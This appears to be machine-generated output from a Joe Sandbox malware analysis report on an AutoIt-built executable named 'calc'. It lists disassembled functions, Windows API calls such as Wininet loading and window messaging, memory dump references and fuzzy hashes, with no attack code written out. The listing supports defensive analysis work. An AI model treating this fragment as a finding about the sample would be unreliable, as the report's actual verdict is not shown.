    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessageSend
    • String ID: '
    • API String ID: 3850602802-1997036262
    • Opcode ID: d2497bf30880c0e0f6f9250b73f4ff933048766acc535da351d0025d50bfa92f
    • Instruction ID: 790da75ecd06bc5f8f21dc72d14b365d84c45d9b578440653fd79ec7c8b9c65c
    • Opcode Fuzzy Hash: d2497bf30880c0e0f6f9250b73f4ff933048766acc535da351d0025d50bfa92f
    • Instruction Fuzzy Hash: BA3109B19003099FCB10CF99C880ADEB7F5FF58310F55446AEA49EB795D374A981CB98
    Function 0042B031 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0042FF12: LoadLibraryA.KERNEL32(Wininet.dll,0042B04C,?,00000000), ref: 0042FF1D
      • Part of subcall function 0042FF12: GetProcAddress.KERNEL32(00000000,InternetCrackUrlW), ref: 0042FF2F
    • FreeLibrary.KERNEL32(?,?,00000000), ref: 0042B0BB
    • FreeLibrary.KERNEL32(?,?,00000000), ref: 0042B106
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Library$Free$AddressLoadProc
    • String ID: <
    • API String ID: 1386263645-4251816714
    • Opcode ID: cae857bcd66ac5bd6c0f5df20a8d0b7e1d57d24965c9690a0dbae3f7b1cb0974
    • Instruction ID: 08250e3cd797b4f165cb22cbd0ca780e2f8aa99a4327fa461dcb274be227e967
    • Opcode Fuzzy Hash: cae857bcd66ac5bd6c0f5df20a8d0b7e1d57d24965c9690a0dbae3f7b1cb0974
    • Instruction Fuzzy Hash: 4D31B3B1D00229EFCB11DF99E8419DEBBF8EF48300F50816BE815A7251D7799A41DFA4
    Function 00454E4A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: __shift_strcat_strlen
    • String ID: e+000
    • API String ID: 208078240-1027065040
    • Opcode ID: c1451e237096401f43faf898fed7d531d20f8d40ded23736f31a8e9cbef58cc2
    • Instruction ID: c17b212e9c6a6195a33cd92223d512c1f4d604f34dd2aa8fe3ac825eb24e3e10
    • Opcode Fuzzy Hash: c1451e237096401f43faf898fed7d531d20f8d40ded23736f31a8e9cbef58cc2
    • Instruction Fuzzy Hash: 7621F3322083909FD71A4A389C913A63BD1AB4231DF1844AFE485CE293D27DC9C8C359
    Function 004244A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
    Download Yara Rule
    APIs
    • SetErrorMode.KERNEL32(00000001), ref: 004244B8
    • GetVolumeInformationW.KERNEL32(00000000,?,000000FF,?,?,?,?,000000FF,00000000), ref: 00424523
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ErrorInformationModeVolume
    • String ID: %lu
    • API String ID: 64830657-685833217
    • Opcode ID: e397fa9c095f20650d96908efd6815d84a7f7086fa4f41ca0cff002e653a0ba1
    • Instruction ID: 52b8ba96a781efff86eab9d710c4b0d9c46507a85bdf29dd436e82410a9f276d
    • Opcode Fuzzy Hash: e397fa9c095f20650d96908efd6815d84a7f7086fa4f41ca0cff002e653a0ba1
    • Instruction Fuzzy Hash: 2821B632A00118AFDB14AB95DC45EEF7378EF44314F10426BB512A71A1DE78EE85CB98
    Function 00413C3D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74fileCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00413E1F: CloseHandle.KERNEL32(?,00000000,00413C39,0045C6D0,0040FFF4,0045C6D0,?,?,004105B4,00000000,0047BD30,00000000,0045C6D0,00000000,00000000,0045C6D0), ref: 00413E2F
    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00000000,?,0045C6D0,00000000,?,00410004,00000000,0045C6D0), ref: 00413CCD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CloseCreateFileHandle
    • String ID: a+b$w+b
    • API String ID: 3498533004-2501309014
    • Opcode ID: d91cdd8369b11ef9a3c164c8206441f8dd3c3036e2c72543d9734c0028e4c0c9
    • Instruction ID: edf53baa4e82ff11f7db368c7cffc4024c74940741b87387b299ffaae9dd17bc
    • Opcode Fuzzy Hash: d91cdd8369b11ef9a3c164c8206441f8dd3c3036e2c72543d9734c0028e4c0c9
    • Instruction Fuzzy Hash: D9110372604304BAEB201E55D946BD27B98AF1079AF24443FF88862251F63D9E81C59C
    Function 0040A9BE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
    Download Yara Rule
    APIs
    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0040AA4A
    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040AA55
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessageSend
    • String ID: Combobox
    • API String ID: 3850602802-2096851135
    • Opcode ID: 7d53d7fb79487526b315ade6c649dc5807220e0396936e94214fb795de8cf3c4
    • Instruction ID: c4c708d04f0f19327094a8dba0ca1a6e2ba202dda6d3c05fc845e7cbb8daae38
    • Opcode Fuzzy Hash: 7d53d7fb79487526b315ade6c649dc5807220e0396936e94214fb795de8cf3c4
    • Instruction Fuzzy Hash: B8119031600348ABDF21CF51CD44ECB3BA5EB49758F01022AF9486A1D1C3799CA0CB99
    Function 0040A701 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON
    Download Yara Rule
    APIs
    • GetWindowTextLengthW.USER32(00000000), ref: 0040A781
    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0040A790
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: LengthMessageSendTextWindow
    • String ID: edit
    • API String ID: 2978978980-2167791130
    • Opcode ID: c2653f4a8f2a9fd3339bdeb911189886ce8e1b58d1724ea3b2bfe0e6e1a0c6a7
    • Instruction ID: 3c8579f57d0c42e063c7e16f0ca5964ab964ff0d5ea83e700c6d5523480232cd
    • Opcode Fuzzy Hash: c2653f4a8f2a9fd3339bdeb911189886ce8e1b58d1724ea3b2bfe0e6e1a0c6a7
    • Instruction Fuzzy Hash: AA112B75040308ABEF228F50CC44BEA37A5AB19355F108126FD54672D1C37ECC659B9A
    Function 00401FC4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54windowCOMMON
    Download Yara Rule
    APIs
    • SendMessageW.USER32(?,000001A2,00000001,?), ref: 00402042
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessageSend
    • String ID: ComboBox$ListBox
    • API String ID: 3850602802-1403004172
    • Opcode ID: 2303a310d22be7274c0e7aee4de40147d00f737fbdecef81fe060a0e40ba6335
    • Instruction ID: 6a2bf43351e90442f0b13493faf7ed6cf4a6bb8ea08880f42cadd4b0a594b3be
    • Opcode Fuzzy Hash: 2303a310d22be7274c0e7aee4de40147d00f737fbdecef81fe060a0e40ba6335
    • Instruction Fuzzy Hash: 82112531404365BBDF216A658C46BAF3B65AF02320F1045AAF5107B2D2C67D884AD349
    Function 00401EA6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
    Download Yara Rule
    APIs
    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00401F21
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessageSend
    • String ID: ComboBox$ListBox
    • API String ID: 3850602802-1403004172
    • Opcode ID: a91a49e7dc2dc44b61eb69c1a5355029e937de63e8ff1d8d8a387ae3f4859454
    • Instruction ID: e9e452ee7395a0ac856e9d180b4f38c93f17947b2fa77818a0f771537a2928a5
    • Opcode Fuzzy Hash: a91a49e7dc2dc44b61eb69c1a5355029e937de63e8ff1d8d8a387ae3f4859454
    • Instruction Fuzzy Hash: FC01D231948365BBDF21AA658C42BAF3B649F05710F1444BBF8007A2E2C73D8D0AD399
    Function 00401F36 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
    Download Yara Rule
    APIs
    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00401FAF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessageSend
    • String ID: ComboBox$ListBox
    • API String ID: 3850602802-1403004172
    • Opcode ID: 3e881806cf51c7beffbd2d34ce1f2877ffe15e65e6e26bebeb5d7a04689f14b4
    • Instruction ID: 3733c26b0adeeb4198756a847cc5c2d4ffc560054351d3a3df5f83e60761485c
    • Opcode Fuzzy Hash: 3e881806cf51c7beffbd2d34ce1f2877ffe15e65e6e26bebeb5d7a04689f14b4
    • Instruction Fuzzy Hash: A301F531908366BBDF216A658C42BEF7E649F01710F1444BBF400762E2C73D890A935D
    Function 004168A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
    Download Yara Rule
    APIs
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0045C6D0,?,?,?,00442C32,00000000,0045C6D0), ref: 004168CE
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00442C32,00000000,0045C6D0), ref: 004168F0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ByteCharMultiWide
    • String ID: 2,D
    • API String ID: 626452242-2418935499
    • Opcode ID: 39913946caf51cc091bb07f8c1f9413f038e7984b2a910a6790c209e72638979
    • Instruction ID: b39320ebaba644329eb74e26f72cd8e91e687b80147ed92d883561fb5b5a7670
    • Opcode Fuzzy Hash: 39913946caf51cc091bb07f8c1f9413f038e7984b2a910a6790c209e72638979
    • Instruction Fuzzy Hash: 84F090321072307EA23166379C4CCEFBE9CDE8B2F8B11062AF509921A1DA259C41D5F9
    Function 00441486 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
    Download Yara Rule
    APIs
    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044149D
    • PostMessageW.USER32(00000000), ref: 004414A4
      • Part of subcall function 00415F9F: Sleep.KERNEL32(000000FA,00479E08,?,?,00420420,00479E08,00479E08,00000001,00000000,?,?,0042018E,00000000,00479E08,00479BD8), ref: 0041602B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: FindMessagePostSleepWindow
    • String ID: Shell_TrayWnd
    • API String ID: 529655941-2988720461
    • Opcode ID: 882ebc6663f28ca6a0bd98369b9ec18506e29be0596869382302bcdea28e45d6
    • Instruction ID: 13f1e06114b1c92f5b92a9acec28f52c76ab9d30df0a71a8e479259ccf974a84
    • Opcode Fuzzy Hash: 882ebc6663f28ca6a0bd98369b9ec18506e29be0596869382302bcdea28e45d6
    • Instruction Fuzzy Hash: 53D0A733784300BAE2302731EC0AFC76614AB81B21F100826B705AA1D2C5B8B8418658
    Function 004414BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
    Download Yara Rule
    APIs
    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004414D3
    • PostMessageW.USER32(00000000), ref: 004414DA
      • Part of subcall function 00415F9F: Sleep.KERNEL32(000000FA,00479E08,?,?,00420420,00479E08,00479E08,00000001,00000000,?,?,0042018E,00000000,00479E08,00479BD8), ref: 0041602B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: FindMessagePostSleepWindow
    • String ID: Shell_TrayWnd
    • API String ID: 529655941-2988720461
    • Opcode ID: 589e054f64da00f93531d73cfc508ff2935bda88848966350afad539d68171e7
    • Instruction ID: e84574dfb991bf2cfa4f23f5b5c2518562de79298c4897d62fa121c786450cbf
    • Opcode Fuzzy Hash: 589e054f64da00f93531d73cfc508ff2935bda88848966350afad539d68171e7
    • Instruction Fuzzy Hash: C0D0A733784300BAE2312731AC0AFC76614AB85B21F100826B705AA1D2C5B8B8418658
    Function 0044B8FC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
    Download Yara Rule
    APIs
    • __lock.LIBCMT ref: 0044B919
      • Part of subcall function 0044C6DB: RtlEnterCriticalSection.KERNEL32(?,?,?,00449CAB,00000004,0045B078,0000000C,0044C5F4,00000000,?,0044C583,?,0045B1B8,00000060), ref: 0044C703
    • RtlEnterCriticalSection.KERNEL32(?,0044A9A3,?,0045B0D8,0000000C,00442D6F,?,00000001,00010000,?,?,00000000,?,00442CC1,?), ref: 0044B924
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CriticalEnterSection$__lock
    • String ID: SF
    • API String ID: 3410214836-3927473838
    • Opcode ID: 39c2bd515478b8c0527db66249fe360f7e71ce56585f6aa3efe2803acf7d3b5c
    • Instruction ID: a775ad8a655dfed215efc293d7e2241f7e8b16a1d901a40f4fc00a87cdfa6261
    • Opcode Fuzzy Hash: 39c2bd515478b8c0527db66249fe360f7e71ce56585f6aa3efe2803acf7d3b5c
    • Instruction Fuzzy Hash: 36D013F5E0110567EF2C55755DC565D625DE6487827654D5BFD01C17C1DB1CD840500E
    Function 004144F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
    Download Yara Rule
    APIs
    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00414505
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Message
    • String ID: AutoIt$Error allocating memory.
    • API String ID: 2030045667-4017498283
    • Opcode ID: 51696de96423d23a4554865a5e231a209439b8f9565aacacb4bf79dea99f3da3
    • Instruction ID: 2297da2f1b184b157dc422602c855f75b819f819d268e52e3558a929044e264b
    • Opcode Fuzzy Hash: 51696de96423d23a4554865a5e231a209439b8f9565aacacb4bf79dea99f3da3
    • Instruction Fuzzy Hash: 90B092B07C0309B6E22032906C4BF8426000B04F07F2004167718680D305CE10AC011E
    Function 00417DBC Relevance: 5.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CloseHandle
    • String ID:
    • API String ID: 2962429428-0
    • Opcode ID: fcc65564337efeded0ceb8b458db640fb801078e850b321e4cb6b3b0c890e3b1
    • Instruction ID: 9fbff2a46f1a3b6b9582897a9c6c7ca7b8380da915333fee2be5e575753045a6
    • Opcode Fuzzy Hash: fcc65564337efeded0ceb8b458db640fb801078e850b321e4cb6b3b0c890e3b1
    • Instruction Fuzzy Hash: 84F04F32240704ABCB219F1ADC82A97B3F4EF54369B14452ED08692630C679EC819E14